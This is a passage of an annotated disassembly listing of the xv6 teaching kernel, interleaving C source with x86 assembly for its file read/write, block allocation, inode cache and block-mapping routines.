80100fae: 5d pop %ebp 80100faf: c3 ret int r; if(f->readable == 0) return -1; if(f->type == FD_PIPE) return piperead(f->pipe, addr, n); 80100fb0: 8b 43 0c mov 0xc(%ebx),%eax 80100fb3: 89 45 08 mov %eax,0x8(%ebp) f->off += r; iunlock(f->ip); return r; } panic("fileread"); } 80100fb6: 8d 65 f4 lea -0xc(%ebp),%esp 80100fb9: 5b pop %ebx 80100fba: 5e pop %esi 80100fbb: 5f pop %edi 80100fbc: 5d pop %ebp int r; if(f->readable == 0) return -1; if(f->type == FD_PIPE) return piperead(f->pipe, addr, n); 80100fbd: e9 ce 24 00 00 jmp 80103490 <piperead> 80100fc2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi fileread(struct file *f, char *addr, int n) { int r; if(f->readable == 0) return -1; 80100fc8: b8 ff ff ff ff mov $0xffffffff,%eax 80100fcd: eb d9 jmp 80100fa8 <fileread+0x58> if((r = readi(f->ip, addr, f->off, n)) > 0) f->off += r; iunlock(f->ip); return r; } panic("fileread"); 80100fcf: 83 ec 0c sub $0xc,%esp 80100fd2: 68 46 72 10 80 push $0x80107246 80100fd7: e8 94 f3 ff ff call 80100370 <panic> 80100fdc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80100fe0 <filewrite>: //PAGEBREAK! // Write to file f. int filewrite(struct file *f, char *addr, int n) { 80100fe0: 55 push %ebp 80100fe1: 89 e5 mov %esp,%ebp 80100fe3: 57 push %edi 80100fe4: 56 push %esi 80100fe5: 53 push %ebx 80100fe6: 83 ec 1c sub $0x1c,%esp 80100fe9: 8b 75 08 mov 0x8(%ebp),%esi 80100fec: 8b 45 0c mov 0xc(%ebp),%eax int r; if(f->writable == 0) 80100fef: 80 7e 09 00 cmpb $0x0,0x9(%esi) //PAGEBREAK! // Write to file f. int filewrite(struct file *f, char *addr, int n) { 80100ff3: 89 45 dc mov %eax,-0x24(%ebp) 80100ff6: 8b 45 10 mov 0x10(%ebp),%eax 80100ff9: 89 45 e4 mov %eax,-0x1c(%ebp) int r; if(f->writable == 0) 80100ffc: 0f 84 aa 00 00 00 je 801010ac <filewrite+0xcc> return -1; if(f->type == FD_PIPE) 80101002: 8b 06 mov (%esi),%eax 80101004: 83 f8 01 cmp $0x1,%eax 80101007: 0f 84 c2 00 00 00 je 801010cf <filewrite+0xef> return pipewrite(f->pipe, addr, n); if(f->type == FD_INODE){ 8010100d: 83 f8 02 cmp $0x2,%eax 80101010: 0f 85 d8 00 00 00 jne 801010ee <filewrite+0x10e> // and 2 blocks of slop for non-aligned writes. // this really belongs lower down, since writei() // might be writing a device like the console. int max = ((LOGSIZE-1-1-2) / 2) * 512; int i = 0; while(i < n){ 80101016: 8b 45 e4 mov -0x1c(%ebp),%eax 80101019: 31 ff xor %edi,%edi 8010101b: 85 c0 test %eax,%eax 8010101d: 7f 34 jg 80101053 <filewrite+0x73> 8010101f: e9 9c 00 00 00 jmp 801010c0 <filewrite+0xe0> 80101024: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi n1 = max; begin_op(); ilock(f->ip); if ((r = writei(f->ip, addr + i, f->off, n1)) > 0) f->off += r; 80101028: 01 46 14 add %eax,0x14(%esi) iunlock(f->ip); 8010102b: 83 ec 0c sub $0xc,%esp 8010102e: ff 76 10 pushl 0x10(%esi) n1 = max; begin_op(); ilock(f->ip); if ((r = writei(f->ip, addr + i, f->off, n1)) > 0) f->off += r; 80101031: 89 45 e0 mov %eax,-0x20(%ebp) iunlock(f->ip); 80101034: e8 17 07 00 00 call 80101750 <iunlock> end_op(); 80101039: e8 82 1b 00 00 call 80102bc0 <end_op> 8010103e: 8b 45 e0 mov -0x20(%ebp),%eax 80101041: 83 c4 10 add $0x10,%esp if(r < 0) break; if(r != n1) 80101044: 39 d8 cmp %ebx,%eax 80101046: 0f 85 95 00 00 00 jne 801010e1 <filewrite+0x101> panic("short filewrite"); i += r; 8010104c: 01 c7 add %eax,%edi // and 2 blocks of slop for non-aligned writes. // this really belongs lower down, since writei() // might be writing a device like the console. int max = ((LOGSIZE-1-1-2) / 2) * 512; int i = 0; while(i < n){ 8010104e: 39 7d e4 cmp %edi,-0x1c(%ebp) 80101051: 7e 6d jle 801010c0 <filewrite+0xe0> int n1 = n - i; 80101053: 8b 5d e4 mov -0x1c(%ebp),%ebx 80101056: b8 00 1a 00 00 mov $0x1a00,%eax 8010105b: 29 fb sub %edi,%ebx 8010105d: 81 fb 00 1a 00 00 cmp $0x1a00,%ebx 80101063: 0f 4f d8 cmovg %eax,%ebx if(n1 > max) n1 = max; begin_op(); 80101066: e8 e5 1a 00 00 call 80102b50 <begin_op> ilock(f->ip); 8010106b: 83 ec 0c sub $0xc,%esp 8010106e: ff 76 10 pushl 0x10(%esi) 80101071: e8 fa 05 00 00 call 80101670 <ilock> if ((r = writei(f->ip, addr + i, f->off, n1)) > 0) 80101076: 8b 45 dc mov -0x24(%ebp),%eax 80101079: 53 push %ebx 8010107a: ff 76 14 pushl 0x14(%esi) 8010107d: 01 f8 add %edi,%eax 8010107f: 50 push %eax 80101080: ff 76 10 pushl 0x10(%esi) 80101083: e8 c8 09 00 00 call 80101a50 <writei> 80101088: 83 c4 20 add $0x20,%esp 8010108b: 85 c0 test %eax,%eax 8010108d: 7f 99 jg 80101028 <filewrite+0x48> f->off += r; iunlock(f->ip); 8010108f: 83 ec 0c sub $0xc,%esp 80101092: ff 76 10 pushl 0x10(%esi) 80101095: 89 45 e0 mov %eax,-0x20(%ebp) 80101098: e8 b3 06 00 00 call 80101750 <iunlock> end_op(); 8010109d: e8 1e 1b 00 00 call 80102bc0 <end_op> if(r < 0) 801010a2: 8b 45 e0 mov -0x20(%ebp),%eax 801010a5: 83 c4 10 add $0x10,%esp 801010a8: 85 c0 test %eax,%eax 801010aa: 74 98 je 80101044 <filewrite+0x64> i += r; } return i == n ? n : -1; } panic("filewrite"); } 801010ac: 8d 65 f4 lea -0xc(%ebp),%esp break; if(r != n1) panic("short filewrite"); i += r; } return i == n ? n : -1; 801010af: b8 ff ff ff ff mov $0xffffffff,%eax } panic("filewrite"); } 801010b4: 5b pop %ebx 801010b5: 5e pop %esi 801010b6: 5f pop %edi 801010b7: 5d pop %ebp 801010b8: c3 ret 801010b9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi break; if(r != n1) panic("short filewrite"); i += r; } return i == n ? n : -1; 801010c0: 3b 7d e4 cmp -0x1c(%ebp),%edi 801010c3: 75 e7 jne 801010ac <filewrite+0xcc> } panic("filewrite"); } 801010c5: 8d 65 f4 lea -0xc(%ebp),%esp 801010c8: 89 f8 mov %edi,%eax 801010ca: 5b pop %ebx 801010cb: 5e pop %esi 801010cc: 5f pop %edi 801010cd: 5d pop %ebp 801010ce: c3 ret int r; if(f->writable == 0) return -1; if(f->type == FD_PIPE) return pipewrite(f->pipe, addr, n); 801010cf: 8b 46 0c mov 0xc(%esi),%eax 801010d2: 89 45 08 mov %eax,0x8(%ebp) i += r; } return i == n ? n : -1; } panic("filewrite"); } 801010d5: 8d 65 f4 lea -0xc(%ebp),%esp 801010d8: 5b pop %ebx 801010d9: 5e pop %esi 801010da: 5f pop %edi 801010db: 5d pop %ebp int r; if(f->writable == 0) return -1; if(f->type == FD_PIPE) return pipewrite(f->pipe, addr, n); 801010dc: e9 af 22 00 00 jmp 80103390 <pipewrite> end_op(); if(r < 0) break; if(r != n1) panic("short filewrite"); 801010e1: 83 ec 0c sub $0xc,%esp 801010e4: 68 4f 72 10 80 push $0x8010724f 801010e9: e8 82 f2 ff ff call 80100370 <panic> i += r; } return i == n ? n : -1; } panic("filewrite"); 801010ee: 83 ec 0c sub $0xc,%esp 801010f1: 68 55 72 10 80 push $0x80107255 801010f6: e8 75 f2 ff ff call 80100370 <panic> 801010fb: 66 90 xchg %ax,%ax 801010fd: 66 90 xchg %ax,%ax 801010ff: 90 nop 80101100 <balloc>: // Blocks. // Allocate a zeroed disk block. static uint balloc(uint dev) { 80101100: 55 push %ebp 80101101: 89 e5 mov %esp,%ebp 80101103: 57 push %edi 80101104: 56 push %esi 80101105: 53 push %ebx 80101106: 83 ec 1c sub $0x1c,%esp int b, bi, m; struct buf *bp; bp = 0; for(b = 0; b < sb.size; b += BPB){ 80101109: 8b 0d e0 09 11 80 mov 0x801109e0,%ecx // Blocks. // Allocate a zeroed disk block. static uint balloc(uint dev) { 8010110f: 89 45 d8 mov %eax,-0x28(%ebp) int b, bi, m; struct buf *bp; bp = 0; for(b = 0; b < sb.size; b += BPB){ 80101112: 85 c9 test %ecx,%ecx 80101114: 0f 84 85 00 00 00 je 8010119f <balloc+0x9f> 8010111a: c7 45 dc 00 00 00 00 movl $0x0,-0x24(%ebp) bp = bread(dev, BBLOCK(b, sb)); 80101121: 8b 75 dc mov -0x24(%ebp),%esi 80101124: 83 ec 08 sub $0x8,%esp 80101127: 89 f0 mov %esi,%eax 80101129: c1 f8 0c sar $0xc,%eax 8010112c: 03 05 f8 09 11 80 add 0x801109f8,%eax 80101132: 50 push %eax 80101133: ff 75 d8 pushl -0x28(%ebp) 80101136: e8 95 ef ff ff call 801000d0 <bread> 8010113b: 89 45 e4 mov %eax,-0x1c(%ebp) 8010113e: a1 e0 09 11 80 mov 0x801109e0,%eax 80101143: 83 c4 10 add $0x10,%esp 80101146: 89 45 e0 mov %eax,-0x20(%ebp) for(bi = 0; bi < BPB && b + bi < sb.size; bi++){ 80101149: 31 c0 xor %eax,%eax 8010114b: eb 2d jmp 8010117a <balloc+0x7a> 8010114d: 8d 76 00 lea 0x0(%esi),%esi m = 1 << (bi % 8); 80101150: 89 c1 mov %eax,%ecx 80101152: ba 01 00 00 00 mov $0x1,%edx if((bp->data[bi/8] & m) == 0){ // Is block free? 80101157: 8b 5d e4 mov -0x1c(%ebp),%ebx bp = 0; for(b = 0; b < sb.size; b += BPB){ bp = bread(dev, BBLOCK(b, sb)); for(bi = 0; bi < BPB && b + bi < sb.size; bi++){ m = 1 << (bi % 8); 8010115a: 83 e1 07 and $0x7,%ecx 8010115d: d3 e2 shl %cl,%edx if((bp->data[bi/8] & m) == 0){ // Is block free? 8010115f: 89 c1 mov %eax,%ecx 80101161: c1 f9 03 sar $0x3,%ecx 80101164: 0f b6 7c 0b 5c movzbl 0x5c(%ebx,%ecx,1),%edi 80101169: 85 d7 test %edx,%edi 8010116b: 74 43 je 801011b0 <balloc+0xb0> struct buf *bp; bp = 0; for(b = 0; b < sb.size; b += BPB){ bp = bread(dev, BBLOCK(b, sb)); for(bi = 0; bi < BPB && b + bi < sb.size; bi++){ 8010116d: 83 c0 01 add $0x1,%eax 80101170: 83 c6 01 add $0x1,%esi 80101173: 3d 00 10 00 00 cmp $0x1000,%eax 80101178: 74 05 je 8010117f <balloc+0x7f> 8010117a: 3b 75 e0 cmp -0x20(%ebp),%esi 8010117d: 72 d1 jb 80101150 <balloc+0x50> brelse(bp); bzero(dev, b + bi); return b + bi; } } brelse(bp); 8010117f: 83 ec 0c sub $0xc,%esp 80101182: ff 75 e4 pushl -0x1c(%ebp) 80101185: e8 56 f0 ff ff call 801001e0 <brelse> { int b, bi, m; struct buf *bp; bp = 0; for(b = 0; b < sb.size; b += BPB){ 8010118a: 81 45 dc 00 10 00 00 addl $0x1000,-0x24(%ebp) 80101191: 83 c4 10 add $0x10,%esp 80101194: 8b 45 dc mov -0x24(%ebp),%eax 80101197: 39 05 e0 09 11 80 cmp %eax,0x801109e0 8010119d: 77 82 ja 80101121 <balloc+0x21> return b + bi; } } brelse(bp); } panic("balloc: out of blocks"); 8010119f: 83 ec 0c sub $0xc,%esp 801011a2: 68 5f 72 10 80 push $0x8010725f 801011a7: e8 c4 f1 ff ff call 80100370 <panic> 801011ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi for(b = 0; b < sb.size; b += BPB){ bp = bread(dev, BBLOCK(b, sb)); for(bi = 0; bi < BPB && b + bi < sb.size; bi++){ m = 1 << (bi % 8); if((bp->data[bi/8] & m) == 0){ // Is block free? bp->data[bi/8] |= m; // Mark block in use. 801011b0: 09 fa or %edi,%edx 801011b2: 8b 7d e4 mov -0x1c(%ebp),%edi log_write(bp); 801011b5: 83 ec 0c sub $0xc,%esp for(b = 0; b < sb.size; b += BPB){ bp = bread(dev, BBLOCK(b, sb)); for(bi = 0; bi < BPB && b + bi < sb.size; bi++){ m = 1 << (bi % 8); if((bp->data[bi/8] & m) == 0){ // Is block free? bp->data[bi/8] |= m; // Mark block in use. 801011b8: 88 54 0f 5c mov %dl,0x5c(%edi,%ecx,1) log_write(bp); 801011bc: 57 push %edi 801011bd: e8 6e 1b 00 00 call 80102d30 <log_write> brelse(bp); 801011c2: 89 3c 24 mov %edi,(%esp) 801011c5: e8 16 f0 ff ff call 801001e0 <brelse> static void bzero(int dev, int bno) { struct buf *bp; bp = bread(dev, bno); 801011ca: 58 pop %eax 801011cb: 5a pop %edx 801011cc: 56 push %esi 801011cd: ff 75 d8 pushl -0x28(%ebp) 801011d0: e8 fb ee ff ff call 801000d0 <bread> 801011d5: 89 c3 mov %eax,%ebx memset(bp->data, 0, BSIZE); 801011d7: 8d 40 5c lea 0x5c(%eax),%eax 801011da: 83 c4 0c add $0xc,%esp 801011dd: 68 00 02 00 00 push $0x200 801011e2: 6a 00 push $0x0 801011e4: 50 push %eax 801011e5: e8 a6 34 00 00 call 80104690 <memset> log_write(bp); 801011ea: 89 1c 24 mov %ebx,(%esp) 801011ed: e8 3e 1b 00 00 call 80102d30 <log_write> brelse(bp); 801011f2: 89 1c 24 mov %ebx,(%esp) 801011f5: e8 e6 ef ff ff call 801001e0 <brelse> } } brelse(bp); } panic("balloc: out of blocks"); } 801011fa: 8d 65 f4 lea -0xc(%ebp),%esp 801011fd: 89 f0 mov %esi,%eax 801011ff: 5b pop %ebx 80101200: 5e pop %esi 80101201: 5f pop %edi 80101202: 5d pop %ebp 80101203: c3 ret 80101204: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 8010120a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80101210 <iget>: // Find the inode with number inum on device dev // and return the in-memory copy. Does not lock // the inode and does not read it from disk. static struct inode* iget(uint dev, uint inum) { 80101210: 55 push %ebp 80101211: 89 e5 mov %esp,%ebp 80101213: 57 push %edi 80101214: 56 push %esi 80101215: 53 push %ebx 80101216: 89 c7 mov %eax,%edi struct inode *ip, *empty; acquire(&icache.lock); // Is the inode already cached? empty = 0; 80101218: 31 f6 xor %esi,%esi for(ip = &icache.inode[0]; ip < &icache.inode[NINODE]; ip++){ 8010121a: bb 34 0a 11 80 mov $0x80110a34,%ebx // Find the inode with number inum on device dev // and return the in-memory copy. Does not lock // the inode and does not read it from disk. static struct inode* iget(uint dev, uint inum) { 8010121f: 83 ec 28 sub $0x28,%esp 80101222: 89 55 e4 mov %edx,-0x1c(%ebp) struct inode *ip, *empty; acquire(&icache.lock); 80101225: 68 00 0a 11 80 push $0x80110a00 8010122a: e8 f1 32 00 00 call 80104520 <acquire> 8010122f: 83 c4 10 add $0x10,%esp // Is the inode already cached? empty = 0; for(ip = &icache.inode[0]; ip < &icache.inode[NINODE]; ip++){ 80101232: 8b 55 e4 mov -0x1c(%ebp),%edx 80101235: eb 1b jmp 80101252 <iget+0x42> 80101237: 89 f6 mov %esi,%esi 80101239: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi if(ip->ref > 0 && ip->dev == dev && ip->inum == inum){ ip->ref++; release(&icache.lock); return ip; } if(empty == 0 && ip->ref == 0) // Remember empty slot. 80101240: 85 f6 test %esi,%esi 80101242: 74 44 je 80101288 <iget+0x78> acquire(&icache.lock); // Is the inode already cached? empty = 0; for(ip = &icache.inode[0]; ip < &icache.inode[NINODE]; ip++){ 80101244: 81 c3 90 00 00 00 add $0x90,%ebx 8010124a: 81 fb 54 26 11 80 cmp $0x80112654,%ebx 80101250: 74 4e je 801012a0 <iget+0x90> if(ip->ref > 0 && ip->dev == dev && ip->inum == inum){ 80101252: 8b 4b 08 mov 0x8(%ebx),%ecx 80101255: 85 c9 test %ecx,%ecx 80101257: 7e e7 jle 80101240 <iget+0x30> 80101259: 39 3b cmp %edi,(%ebx) 8010125b: 75 e3 jne 80101240 <iget+0x30> 8010125d: 39 53 04 cmp %edx,0x4(%ebx) 80101260: 75 de jne 80101240 <iget+0x30> ip->ref++; release(&icache.lock); 80101262: 83 ec 0c sub $0xc,%esp // Is the inode already cached? empty = 0; for(ip = &icache.inode[0]; ip < &icache.inode[NINODE]; ip++){ if(ip->ref > 0 && ip->dev == dev && ip->inum == inum){ ip->ref++; 80101265: 83 c1 01 add $0x1,%ecx release(&icache.lock); return ip; 80101268: 89 de mov %ebx,%esi // Is the inode already cached? empty = 0; for(ip = &icache.inode[0]; ip < &icache.inode[NINODE]; ip++){ if(ip->ref > 0 && ip->dev == dev && ip->inum == inum){ ip->ref++; release(&icache.lock); 8010126a: 68 00 0a 11 80 push $0x80110a00 // Is the inode already cached? empty = 0; for(ip = &icache.inode[0]; ip < &icache.inode[NINODE]; ip++){ if(ip->ref > 0 && ip->dev == dev && ip->inum == inum){ ip->ref++; 8010126f: 89 4b 08 mov %ecx,0x8(%ebx) release(&icache.lock); 80101272: e8 c9 33 00 00 call 80104640 <release> return ip; 80101277: 83 c4 10 add $0x10,%esp ip->ref = 1; ip->valid = 0; release(&icache.lock); return ip; } 8010127a: 8d 65 f4 lea -0xc(%ebp),%esp 8010127d: 89 f0 mov %esi,%eax 8010127f: 5b pop %ebx 80101280: 5e pop %esi 80101281: 5f pop %edi 80101282: 5d pop %ebp 80101283: c3 ret 80101284: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if(ip->ref > 0 && ip->dev == dev && ip->inum == inum){ ip->ref++; release(&icache.lock); return ip; } if(empty == 0 && ip->ref == 0) // Remember empty slot. 80101288: 85 c9 test %ecx,%ecx 8010128a: 0f 44 f3 cmove %ebx,%esi acquire(&icache.lock); // Is the inode already cached? empty = 0; for(ip = &icache.inode[0]; ip < &icache.inode[NINODE]; ip++){ 8010128d: 81 c3 90 00 00 00 add $0x90,%ebx 80101293: 81 fb 54 26 11 80 cmp $0x80112654,%ebx 80101299: 75 b7 jne 80101252 <iget+0x42> 8010129b: 90 nop 8010129c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if(empty == 0 && ip->ref == 0) // Remember empty slot. empty = ip; } // Recycle an inode cache entry. if(empty == 0) 801012a0: 85 f6 test %esi,%esi 801012a2: 74 2d je 801012d1 <iget+0xc1> ip = empty; ip->dev = dev; ip->inum = inum; ip->ref = 1; ip->valid = 0; release(&icache.lock); 801012a4: 83 ec 0c sub $0xc,%esp // Recycle an inode cache entry. if(empty == 0) panic("iget: no inodes"); ip = empty; ip->dev = dev; 801012a7: 89 3e mov %edi,(%esi) ip->inum = inum; 801012a9: 89 56 04 mov %edx,0x4(%esi) ip->ref = 1; 801012ac: c7 46 08 01 00 00 00 movl $0x1,0x8(%esi) ip->valid = 0; 801012b3: c7 46 4c 00 00 00 00 movl $0x0,0x4c(%esi) release(&icache.lock); 801012ba: 68 00 0a 11 80 push $0x80110a00 801012bf: e8 7c 33 00 00 call 80104640 <release> return ip; 801012c4: 83 c4 10 add $0x10,%esp } 801012c7: 8d 65 f4 lea -0xc(%ebp),%esp 801012ca: 89 f0 mov %esi,%eax 801012cc: 5b pop %ebx 801012cd: 5e pop %esi 801012ce: 5f pop %edi 801012cf: 5d pop %ebp 801012d0: c3 ret empty = ip; } // Recycle an inode cache entry. if(empty == 0) panic("iget: no inodes"); 801012d1: 83 ec 0c sub $0xc,%esp 801012d4: 68 75 72 10 80 push $0x80107275 801012d9: e8 92 f0 ff ff call 80100370 <panic> 801012de: 66 90 xchg %ax,%ax 801012e0 <bmap>: // Return the disk block address of the nth block in inode ip. // If there is no such block, bmap allocates one. static uint bmap(struct inode *ip, uint bn) { 801012e0: 55 push %ebp 801012e1: 89 e5 mov %esp,%ebp 801012e3: 57 push %edi 801012e4: 56 push %esi 801012e5: 53 push %ebx 801012e6: 89 c6 mov %eax,%esi 801012e8: 83 ec 1c sub $0x1c,%esp uint addr, *a; struct buf *bp; if(bn < NDIRECT){ 801012eb: 83 fa 0b cmp $0xb,%edx 801012ee: 77 18 ja 80101308 <bmap+0x28> 801012f0: 8d 1c 90 lea (%eax,%edx,4),%ebx if((addr = ip->addrs[bn]) == 0) 801012f3: 8b 43 5c mov 0x5c(%ebx),%eax 801012f6: 85 c0 test %eax,%eax 801012f8: 74 76 je 80101370 <bmap+0x90> brelse(bp); return addr; } panic("bmap: out of range"); } 801012fa: 8d 65 f4 lea -0xc(%ebp),%esp 801012fd: 5b pop %ebx 801012fe: 5e pop %esi 801012ff: 5f pop %edi 80101300: 5d pop %ebp 80101301: c3 ret 80101302: 8d b6 00 00 00 00 lea 0x0(%esi),%esi if(bn < NDIRECT){ if((addr = ip->addrs[bn]) == 0) ip->addrs[bn] = addr = balloc(ip->dev); return addr; } bn -= NDIRECT; 80101308: 8d 5a f4 lea -0xc(%edx),%ebx if(bn < NINDIRECT){ 8010130b: 83 fb 7f cmp $0x7f,%ebx 8010130e: 0f 87 83 00 00 00 ja 80101397 <bmap+0xb7> // Load indirect block, allocating if necessary. if((addr = ip->addrs[NDIRECT]) == 0) 80101314: 8b 80 8c 00 00 00 mov 0x8c(%eax),%eax 8010131a: 85 c0 test %eax,%eax 8010131c: 74 6a je 80101388 <bmap+0xa8> ip->addrs[NDIRECT] = addr = balloc(ip->dev); bp = bread(ip->dev, addr); 8010131e: 83 ec 08 sub $0x8,%esp 80101321: 50 push %eax 80101322: ff 36 pushl (%esi) 80101324: e8 a7 ed ff ff call 801000d0 <bread> a = (uint*)bp->data; if((addr = a[bn]) == 0){ 80101329: 8d 54 98 5c lea 0x5c(%eax,%ebx,4),%edx 8010132d: 83 c4 10 add $0x10,%esp if(bn < NINDIRECT){ // Load indirect block, allocating if necessary. if((addr = ip->addrs[NDIRECT]) == 0) ip->addrs[NDIRECT] = addr = balloc(ip->dev); bp = bread(ip->dev, addr); 80101330: 89 c7 mov %eax,%edi a = (uint*)bp->data; if((addr = a[bn]) == 0){ 80101332: 8b 1a mov (%edx),%ebx 80101334: 85 db test %ebx,%ebx 80101336: 75 1d jne 80101355 <bmap+0x75> a[bn] = addr = balloc(ip->dev); 80101338: 8b 06 mov (%esi),%eax 8010133a: 89 55 e4 mov %edx,-0x1c(%ebp) 8010133d: e8 be fd ff ff call 80101100 <balloc> 80101342: 8b 55 e4 mov -0x1c(%ebp),%edx log_write(bp); 80101345: 83 ec 0c sub $0xc,%esp if((addr = ip->addrs[NDIRECT]) == 0) ip->addrs[NDIRECT] = addr = balloc(ip->dev); bp = bread(ip->dev, addr); a = (uint*)bp->data; if((addr = a[bn]) == 0){ a[bn] = addr = balloc(ip->dev); 80101348: 89 c3 mov %eax,%ebx 8010134a: 89 02 mov %eax,(%edx) log_write(bp); 8010134c: 57 push %edi 8010134d: e8 de 19 00 00 call 80102d30 <log_write> 80101352: 83 c4 10 add $0x10,%esp } brelse(bp); 80101355: 83 ec 0c sub $0xc,%esp 80101358: 57 push %edi 80101359: e8 82 ee ff ff call 801001e0 <brelse> 8010135e: 83 c4 10 add $0x10,%esp return addr; } panic("bmap: out of range"); } 80101361: 8d 65 f4 lea -0xc(%ebp),%esp a = (uint*)bp->data; if((addr = a[bn]) == 0){ a[bn] = addr = balloc(ip->dev); log_write(bp); } brelse(bp); 80101364: 89 d8 mov %ebx,%eax return addr; } panic("bmap: out of range"); } 80101366: 5b pop %ebx 80101367: 5e pop %esi 80101368: 5f pop %edi 80101369: 5d pop %ebp 8010136a: c3 ret 8010136b: 90 nop 8010136c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi uint addr, *a; struct buf *bp; if(bn < NDIRECT){ if((addr = ip->addrs[bn]) == 0) ip->addrs[bn] = addr = balloc(ip->dev); 80101370: 8b 06 mov (%esi),%eax 80101372: e8 89 fd ff ff call 80101100 <balloc> 80101377: 89 43 5c mov %eax,0x5c(%ebx) brelse(bp); return addr; } panic("bmap: out of range"); } 8010137a: 8d 65 f4 lea -0xc(%ebp),%esp 8010137d: 5b pop %ebx 8010137e: 5e pop %esi 8010137f: 5f pop %edi 80101380: 5d pop %ebp 80101381: c3 ret 80101382: 8d b6 00 00 00 00 lea 0x0(%esi),%esi bn -= NDIRECT; if(bn < NINDIRECT){ // Load indirect block, allocating if necessary. if((addr = ip->addrs[NDIRECT]) == 0) ip->addrs[NDIRECT] = addr = balloc(ip->dev); 80101388: 8b 06 mov (%esi),%eax 8010138a: e8 71 fd ff ff call 80101100 <balloc> 8010138f: 89 86 8c 00 00 00 mov %eax,0x8c(%esi) 80101395: eb 87 jmp 8010131e <bmap+0x3e> } brelse(bp); return addr; } panic("bmap: out of range"); 80101397: 83 ec 0c sub $0xc,%esp 8010139a: 68 85 72 10 80 push $0x80107285 8010139f: e8 cc ef ff ff call 80100370 <panic> 801013a4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 801013aa: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 801013b0 <readsb>: struct superblock sb; // Read the super block. void readsb(int dev, struct superblock *sb) { 801013b0: 55 push %ebp 801013b1: 89 e5 mov %esp,%ebp 801013b3: 56 push %esi 801013b4: 53 push %ebx 801013b5: 8b 75 0c mov 0xc(%ebp),%esi struct buf *bp; bp = bread(dev, 1); 801013b8: 83 ec 08 sub $0x8,%esp 801013bb: 6a 01 push $0x1 801013bd: ff 75 08 pushl 0x8(%ebp) 801013c0: e8 0b ed ff ff call 801000d0 <bread> 801013c5: 89 c3 mov %eax,%ebx memmove(sb, bp->data, sizeof(*sb)); 801013c7: 8d 40 5c lea 0x5c(%eax),%eax 801013ca: 83 c4 0c add $0xc,%esp 801013cd: 6a 1c push $0x1c 801013cf: 50 push %eax 801013d0: 56 push %esi 801013d1: e8 6a 33 00 00 call 80104740 <memmove> brelse(bp); 801013d6: 89 5d 08 mov %ebx,0x8(%ebp) 801013d9: 83 c4 10 add $0x10,%esp } 801013dc: 8d 65 f8 lea -0x8(%ebp),%esp 801013df: 5b pop %ebx 801013e0: 5e pop %esi 801013e1: 5d pop %ebp { struct buf *bp; bp = bread(dev, 1); memmove(sb, bp->data, sizeof(*sb)); brelse(bp); 801013e2: e9 f9 ed ff ff jmp 801001e0 <brelse> 801013e7: 89 f6 mov %esi,%esi 801013e9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801013f0 <bfree>: } // Free a disk block. static void bfree(int dev, uint b) { 801013f0: 55 push %ebp 801013f1: 89 e5 mov %esp,%ebp 801013f3: 56 push %esi 801013f4: 53 push %ebx 801013f5: 89 d3 mov %edx,%ebx 801013f7: 89 c6 mov %eax,%esi struct buf *bp; int bi, m; readsb(dev, &sb); 801013f9: 83 ec 08 sub $0x8,%esp 801013fc: 68 e0 09 11 80 push $0x801109e0 80101401: 50 push %eax 80101402: e8 a9 ff ff ff call 801013b0 <readsb> bp = bread(dev, BBLOCK(b, sb)); 80101407: 58 pop %eax 80101408: 5a pop %edx 80101409: 89 da mov %ebx,%edx 8010140b: c1 ea 0c shr $0xc,%edx 8010140e: 03 15 f8 09 11 80 add 0x801109f8,%edx 80101414: 52 push %edx 80101415: 56 push %esi 80101416: e8 b5 ec ff ff call 801000d0 <bread> bi = b % BPB; m = 1 << (bi % 8); 8010141b: 89 d9 mov %ebx,%ecx if((bp->data[bi/8] & m) == 0) 8010141d: 81 e3 ff 0f 00 00 and $0xfff,%ebx int bi, m; readsb(dev, &sb); bp = bread(dev, BBLOCK(b, sb)); bi = b % BPB; m = 1 << (bi % 8); 80101423: ba 01 00 00 00 mov $0x1,%edx 80101428: 83 e1 07 and $0x7,%ecx if((bp->data[bi/8] & m) == 0) 8010142b: c1 fb 03 sar $0x3,%ebx 8010142e: 83 c4 10 add $0x10,%esp int bi, m; readsb(dev, &sb); bp = bread(dev, BBLOCK(b, sb)); bi = b % BPB; m = 1 << (bi % 8); 80101431: d3 e2 shl %cl,%edx if((bp->data[bi/8] & m) == 0) 80101433: 0f b6 4c 18 5c movzbl 0x5c(%eax,%ebx,1),%ecx 80101438: 85 d1 test %edx,%ecx 8010143a: 74 27 je 80101463 <bfree+0x73> 8010143c: 89 c6 mov %eax,%esi panic("freeing free block"); bp->data[bi/8] &= ~m; 8010143e: f7 d2 not %edx 80101440: 89 c8 mov %ecx,%eax log_write(bp); 80101442: 83 ec 0c sub $0xc,%esp bp = bread(dev, BBLOCK(b, sb)); bi = b % BPB; m = 1 << (bi % 8); if((bp->data[bi/8] & m) == 0) panic("freeing free block"); bp->data[bi/8] &= ~m; 80101445: 21 d0 and %edx,%eax 80101447: 88 44 1e 5c mov %al,0x5c(%esi,%ebx,1) log_write(bp); 8010144b: 56 push %esi 8010144c: e8 df 18 00 00 call 80102d30 <log_write> brelse(bp); 80101451: 89 34 24 mov %esi,(%esp) 80101454: e8 87 ed ff ff call 801001e0 <brelse> } 80101459: 83 c4 10 add $0x10,%esp 8010145c: 8d 65 f8 lea -0x8(%ebp),%esp 8010145f: 5b pop %ebx 80101460: 5e pop %esi 80101461: 5d pop %ebp 80101462: c3 ret readsb(dev, &sb); bp = bread(dev, BBLOCK(b, sb)); bi = b % BPB; m = 1 << (bi % 8); if((bp->data[bi/8] & m) == 0) panic("freeing free block"); 80101463: 83 ec 0c sub $0xc,%esp 80101466: 68 98 72 10 80 push $0x80107298 8010146b: e8 00 ef ff ff call 80100370 <panic> 80101470 <iinit>: struct inode inode[NINODE]; } icache; void iinit(int dev) { 80101470: 55 push %ebp 80101471: 89 e5 mov %esp,%ebp 80101473: 53 push %ebx 80101474: bb 40 0a 11 80 mov 